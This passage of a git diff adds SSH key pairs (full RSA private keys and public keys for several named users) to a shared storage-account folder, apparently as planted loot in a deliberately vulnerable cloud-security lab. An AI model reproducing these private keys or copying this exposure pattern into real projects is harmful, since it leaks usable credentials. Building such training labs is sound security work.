+2C3V2r9UJURQuoPzj1m7cH+haE5POhWqT3gA2VgdsAvroi0E5oEsNkOXpjDbu5AH +K/MFUkZJrTYPzr4D7V/KESDcj1I0E9j5CAA+gnXpKX0AVPd5fmrD6GQMGiUUwFmw +EPeqajXNyoi26JdZwwtdZWmRQs30L5xG6SaD/dsVRFHDG972CB3B0Sycx/BYOsLQ +QBo++OniktL5PrzAU2LiTLXzSAT6TJHnAQaEf+JlT5UHtIrJ7vgm +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub new file 
mode 100644 index 0000000..9bd7189 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQWFk42UyXvedm2dnEpUo8C5kACYK34ATgYhy3/gIjblLDpLvoVR4aWB47pSls8vCmsIr87k6wvkIOE0mk4AjHft0Po1quN14MGVD1EUJ/WHi00zx6rN7nLu8QjHbf7YpVuFR1RFwbyNoTCRdAFuoJIoMNJwML7K0Ie0IdW/7uu8GD03ntoQbcILbBAQEed3wb+9gT4Pr7eIpvVktg3pXhpO1L5RQsAGd6n5JWfkrsH2BHbUyAbpMnKPVJrJUEek/eCDxVM2t1268JITDq/ioSnNWcjC6m/CkVrj63Tq2e3HbLoM4cZu+j91hilH2QmwQHbxCl2PMqRv2/PQ1IQa3e33IE+bZbUqpiIfBJGamU9Qfb9oeKYjUdcvvlB6bnEMTT1aOkU2f32s8wBTkPkRPK18NB9AOtICuGr2ooLbk5WHGAwghtrwLRh3XAJxq2tiiWY1Ief4SCaDvHg4r0ua8sIpMoNjp/hh9Jw3x7FxEWkhGyxIL5uKzl8t2ZAC9uchs= charles diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem new file mode 100644 index 0000000..0c7e48f --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git 
a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub new file mode 100644 index 0000000..bcfcc9a --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSkZpFYT2K2ExN/KGEs0QWQWF6c0kteoFNEUjvby7mg1ZAUniyovn1MOKSXls2Hev75Ep9TAtjPBra7x28wiQWyUYjhQAHolfjdCc+OorkP3UeD/nMQtLDx4NvzqQwVXF5Bxt8CfMp6oqhoWDpnYZJyWTr6AFxwHYsyQ4Tf1x5XqoWJDxXDzNTLQmfdSxGFZzrg5gAhM/GI2//jKEEj8OEMukMTsYyupl0npsxJVnPTD/5mkAokmlE7gdYxmnXDx1i7TNogMO0vSWoyT5BTolr/jEGNtMYxcUUgWnmDBhDBLhvF+2scgW9TQZX9NWoQ40Gu4KEw9V5VYQBUD6nrXxU1CDXmFMhAcfPmBsq22Jbt5Fvvji0c8tvqTurKPQ5ZGMdzFK7zieSiTYKthGAQ9HT031xOhU1ZLODCJhytbLNh6cImAa/v9e8MIAITuzytNMbFclqYrRFqzQxbfQq3FOS+H4komcgc3mXfcJrE23V59kewBcvy/UwNs7P9aEYmy0= john diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem new file mode 100644 index 0000000..d7c1426 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem @@ -0,0 +1,51 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub new file mode 100644 index 0000000..1511e2e --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDjtdhLMR07Y+LMHfMoljmNKhoPd6hrBh5cyFTGOcMgxGXsuL7wMTAEe3BW9jeYbhWxf7Gscgx92O9b1vSgR3cuevhVxN84cA/AVer6t7LYxkggsEW7d4ttVsu52yv6u/zP5in+7IsJAp37SeCkkPdsP08vLoSodQnvRTdAx8Fze7hGU7o1haXllJjq/xQDtpKqCc4ZaglXYpvP4iDHkcsjbun/VbxQXUBXxbxHyC3wa1udEvnhp1/5jflorBGnoS2P3tD+KQiECqXca1+bvOcxmbHG/cmhYdOagZJKl+3g/WO//EhablliQsuAklcxqILvNpwdmrspiHbEmU/5o4/bZ5Lu+fI+YUt1ofNJXIoLpVgVrt5ntorFbQv5njthlzSYFm+k1Ts607aymqHtKJwHdBSkYzsDLQD3iMG4iHTO+5julLo31oyzFKjiH5dvQ/EX0LvTwDmCZYiKDHlsKPIdFdZm1CcZtjQUCehP9QuXHBLBDK6XBpY87Hwo5737nrF2uj4x8JwP0AlO5S6Urbkc6P4AtD2s9DYCBEqmZ5I4+woL9K+V4CnjfNESe0j6jQvDKklhFOk1g3oMyy8iXJweCwE9uQxD+zIApX4lJyf84sxo3uR8pigUriwHuWoWSHv2QbtPGS8t/hNZbPv1mR2B4b2fjode0Gy1912lqfDF6Q== kali@kali diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem new file mode 100644 index 0000000..8485cd6 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub new file mode 100644 index 0000000..cab867a --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqk8WvfglNe230wXkencpbYmCo1z/tpY/AOSZPOTg4ZZMQcBfYPWeceSOSD4JlRQ6vPUCIPsBKv4Gfj1XlEiptens5g3TRskvjP4JasJ5seIFg3tAMorGB9fLG3JOOFYVUVUDKRCWoy3X4FZokUVAB3PCUhfUcwSbhfh+t8+4QUqxn478ffA5ZE4oFM+x2ZEfSLDvJ0WvgDmBxhiZ1mGWF2nvTNHr9fCN1XjA61RJnxjj61LxbzZgPWvx9nS+0IISa0Y7KunKCSuYLFvxyAP6U2xeqXx2TpzX1nxsy4RhLGQwgrfZgGs7qtLHE8HUVGL5uUJfQN0fY8drU7n/vZDb7ZTLDZgiNlv2GuTH0dX8cO4TOJJtgBIJ1yG0yK1DW5v/ZIU+sgFcajvCzPC6s3mapW+VmQ/kSr6Xj/hrBTHZ6ZdgLE7gvgfxQSO6D4aNp8bxxFWWgQqTkDFtPxGHKjywjCCfel2fYoRWaqMBgJRkUCFIrOcObQg6TOb56ZzoeVWk= mary diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem new file mode 100644 index 0000000..b652ee6 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub new file mode 100644 index 0000000..c1ebe07 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5e9y59/Dnq+8XdKrB/4UkeqDnbkNfRkHOSR7unz5+mvL0Pcq/JqNA1edro9F6WwKNl3l15bcnBrrjjSjOvc+I7OPlX1diAyfwmKetf4fMO/e7fuNNaIzeHHl72U4Kn5ZJGKpEhsOO6IfubobWj0bRHvcAbA6/Zv1LYzJeVae8qJattiC1Oe/6+qjzazeZaGU7t4wVOb/sq8s6+k568dVVz0ZG9EUsv24SMh7WdxpE6JwOJ8LySnhzJK06vZp+H1xj8RnugcqrePk/945JB4dS2dwzbzRxE+Wl4M/ez6/bAW7geLuUPTq08oRmY6iG15H/WpJNbhgf84X/v93tsRsNFbhxv4cQCPRhjgjBqRlkN9F2rFpoRxTtLxe+cZVmy8X7cMOELqn5yUtNvuNiLcEr3OshUhiAT1b8GsPTFNkNhHnlpgIx0ax/8MRrhcszIPmv7nrDhqu+kGdSkfQjmwnbqdZzr2z6lRlaWi4SNrlQaSSw0o+lAtKONoYrzZkXAz8= mike diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem new file mode 100644 index 0000000..5926648 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIG5QIBAAKCAYEAvE21PN2YpKKtnVsCrG2ylKpb0o9d85N5e/6RIBIQDMIW0j72 +CKvrSxAO63qui2zhk9a8BJASrlgNyu4r/47gMN90uiGzCpcrsnGL2wLk3t/sUhV6 +V3Ar38UISe6qajBEhF3X739P2rXlJ9PSvGMD3eKqRSfyQPrmwX9YcVA0sF2uo+1A +QEfN4V2ztLbAfVUgzs2o/JCb3TALfZYu/DbU2sNRgLWijq56NWcfZoMICtT12I4t +bzEB8aUw3BnVCOYXZDQFu8s3X5WEFOPuJNuXfh0zlawMbJEjd0ij6NLGpv7us/HG 